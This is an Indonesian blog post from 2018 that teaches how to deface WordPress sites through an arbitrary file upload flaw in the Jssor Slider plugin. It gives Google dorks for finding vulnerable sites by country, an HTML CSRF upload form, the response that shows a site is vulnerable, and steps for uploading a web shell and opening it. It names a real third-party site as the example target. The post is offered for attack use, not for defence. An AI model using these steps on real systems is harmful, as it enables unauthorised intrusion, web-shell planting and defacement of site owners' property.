Sabtu, 19 Mei 2018
Baca Juga
Jssor Arbitary File Upload Exploit Wordpress
Assalamualaikum wr.wb
Hai hai bertemu lagi nihh dengan gw yang cakep ini eaa :v
oke dikesempatan ini gw mau bagi Tutorial Deface Jssor Arbitary File Upload Exploit Wordpress
Alat dan bahan :
- Sc deface ( buat simple aja gpp )
- Dork
inurl:/wp-content/jssor-slider/ site:-Shell IndoXploit
-Exploit
Setelah semuanya siap lanjut kesini gan/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library-CSRF
<html><body><form action="SITE.COM/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" ><input type="file" name="file" /><input type="submit" value="Submit" /></form></body></html>
1. Dorking dulu di google
inurl:/wp-content/jssor-slider/ site:br
inurl:/wp-content/jssor-slider/ site:my
site:id You knowlah kembangin dikit
2. Masukkan exploit seperti ini site.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
contoh :
http://www.regional.fm.br/site/wp-content/jssor-slider/jssor-uploads/
Tambahin exploit /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
jadi begini
http://www.regional.fm.br/site/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
Jika vuln akan ada keterangan seperti ini
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}
3. Masukkan link tersebut ke dalam csrf. Simpan csrf dengan format html
Contoh :
4. Buka CSRF tersebut menggunakan browser, upload shell kalian
5. Akses shell disini gan
/wp-content/jssor-slider/jssor-uploads/nama shell.php
Referensi :
https://adewa-official.blogspot.co.id
